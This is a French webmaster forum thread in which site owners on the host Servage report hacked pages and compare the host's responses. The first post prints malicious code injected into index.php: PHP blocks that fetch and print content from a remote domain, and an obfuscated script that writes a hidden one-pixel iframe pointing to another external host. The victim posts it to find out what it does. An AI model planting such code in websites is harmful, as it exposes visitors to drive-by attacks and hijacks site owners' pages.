Hacking, oui, mais lequel ?

Discussion dans 'Administration d'un site Web' créé par alaincassis, 4 Mai 2008.

  1. alaincassis
    alaincassis WRInaute impliqué
    Inscrit:
    6 Août 2006
    Messages:
    505
    J'aime reçus:
    0
    Bonjour à tous,

    sur mes sites (chez Servage) ces lignes ont été rajoutées dans les index.php :

    if (extension_loaded("curl")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?1611");
    $r = curl_exec($ch);
    curl_close($ch);
    } else { $r=implode("",file("http://100500.muchcool.info/inc.php?1611")); }
    if($r) print $r;

    if (extension_loaded("curl")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?1952");
    $r = curl_exec($ch);
    curl_close($ch);
    } else { $r=implode("",file("http://100500.muchcool.info/inc.php?1952")); }
    if($r) print $r;

    if (extension_loaded("curl")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?403");
    $r = curl_exec($ch);
    curl_close($ch);
    } else { $r=implode("",file("http://100500.muchcool.info/inc.php?403")); }
    if($r) print $r;
    ?>
    <script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,101,118,105,108,116,114,97,102,102,46,110,101,116,47,105,110,46,99,103,105,63,100,101,102,97,117,108,116,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,62,60,47,105,102,114,97,109,101,62));</script>

    Je n'ai pas eu d'effets visibles à part un gros ralentissement du chargement -et donc effondrement des visites-
    Pouvez-vous me dire ce que fait ce script ??

    J'ai déja eu pas mal d'attaques de mes sites, mais uniquement chez Servage et pas les autres hebergeurs. Servage est-t-il plus fragile que d'autres , ou c'est moi qui m'y prend mal (mot de passe du compte , mdp du ftp ? ) ??

    Merci d'avance

    Alain
     
  2. Topsitemaker
    Topsitemaker WRInaute impliqué
    Inscrit:
    19 Novembre 2006
    Messages:
    527
    J'aime reçus:
    0
    Bonjour,
    Ca tente de télécharger plusieurs fichiers, et ca affiche un message

    Rassures-nous,
    tu as déjà trouvé la rustine pour boucher cette faille, ou as-tu au moins rapporté le problème à ton hébergeur.
     
  3. alaincassis
    alaincassis WRInaute impliqué
    Inscrit:
    6 Août 2006
    Messages:
    505
    J'aime reçus:
    0
    Merci,

    Leur support technique était déja au courant.
    C'est pas la première fois chez Servage que mes sites se font hacker. Et pas ceux hebergés ailleurs (simple hasard ?).



    Il y en a-t-il ici qui pratiquent Servage comme hebergeur ?
     
  4. bproductiv
    bproductiv WRInaute accro
    Inscrit:
    27 Décembre 2004
    Messages:
    3 672
    J'aime reçus:
    0
    :twisted: certainement :arrow:
     
  5. alaincassis
    alaincassis WRInaute impliqué
    Inscrit:
    6 Août 2006
    Messages:
    505
    J'aime reçus:
    0
    Ca a fait du bruit au Danemark, et Servage y répond d"une facon plus ...constructive qu'en France:


    "Hej Bruno,
    Thank you for opening the ticket. Unfortunately some Servage server were hacked on
    May, 4th. Due to this index files were tainted with javascript-code. We have fixed
    the security vulnerability and deleted the mentioned code. I'm glad to inform you
    that your account is save again.

    Med venlig hilsen,
    Helge, Support
    Servage Hosting"





    C'est là (pour ceux qui comprennent le danois !!) :
    http://php-fusion.dk/forum/viewthread.p ... rowstart=0
     
  6. MaPiCs
    MaPiCs WRInaute discret
    Inscrit:
    2 Juin 2006
    Messages:
    56
    J'aime reçus:
    2
    Je remonte un vieux post mais il reste d'actualité vue que je me suis fait défacé 200 sites sur servage.

    Le hack à eu lieu le 17 par un certain NobodyCoder.

    J'ai envoyer un message, il ont mis 36 hrs pour répondre ceci :

    At Servage security is our highest priority and the last years we have taken dramatic measures to build the most secure hosting environment around.

    Unfortunately we have however been affected by the Linux kernel vulnerability (CVE-2009-2692) for a 24 hour period. Due to our architecture this exploit did not compromise personal data and all customer records are safe.

    After updating the kernel on our systems we scanned all customer accounts and found that your index was removed. Therefore we kindly ask you to check your webpage and reupload your index page if it is missing.

    We sincerely apologize for this incident and will take measures to ensure to prevent such incidents in the future.


    Best regards,
    Your Servage Team,

    +++++++++++++++++++++++++++++

    Je leur est demander se qu'il comptais faire pour me dédommager.
    Il m'offre un mois gratuit, sympa quand tu sait que je vient de payer 6 mois et que je compte pas laisser mes sites là bas.

    Bon je retourne chez OVH vue que les nouvelles offres avec les serveur mysql sont là maitenant.
    Est-ce que d'autre ont eu le même probleme ?
    L'ideél serais un serveur dedier mais bon faut s'avoir le géré. ;)
     
Chargement...
Similar Threads - Hacking Forum Date
Piratage/Hacking - Millions de pages indéxées Problèmes de référencement spécifiques à vos sites 3 Février 2022
Hacking sur la page vue par Google Bot (non WP) Problèmes de référencement spécifiques à vos sites 1 Août 2021
99% arrive sur des pages 404 suite hacking Problèmes de référencement spécifiques à vos sites 15 Décembre 2016
Se former au Growth Hacking? Débuter en référencement 5 Décembre 2016
wordpress et le hacking Développement d'un site Web ou d'une appli mobile 4 Janvier 2015
Problème hacking Wordpress - fichiers wp-sample.php et wp-admin/wp-user.php Débuter en référencement 30 Avril 2014
Hacking du site et redirection vers un autre Problèmes de référencement spécifiques à vos sites 16 Décembre 2011
hacking wordpress 3.2.1 avec changement de .htacess Administration d'un site Web 27 Novembre 2011
Hacking sur ma home Administration d'un site Web 23 Novembre 2011
tentative de hacking ou pas ? Administration d'un site Web 10 Janvier 2011
Concours de hacking : l'iPhone, Safari, IE8 et Firefox tombent, Chrome résiste Google : l'entreprise, les sites web, les services 25 Mars 2010
Logiciel ou Script d'analyse Logs Apache / hacking ? Administration d'un site Web 17 Juin 2008
hacking Administration d'un site Web 14 Mars 2007
Hacking et Spaming Demandes d'avis et de conseils sur vos sites 4 Mars 2007
tentative de hacking sur mon site? Demandes d'avis et de conseils sur vos sites 29 Janvier 2007
que faire pour se protéger après une tentative de hacking ? Administration d'un site Web 15 Octobre 2006
Description et titre dans Google apres Hacking Administration d'un site Web 15 Octobre 2006
Vulnérabilité Google - Un (petit) hacking est possible ! Google : l'entreprise, les sites web, les services 26 Septembre 2006
Tentative de Hacking ou Pas? Administration d'un site Web 12 Septembre 2006
HACKING!!! Administration d'un site Web 12 Août 2006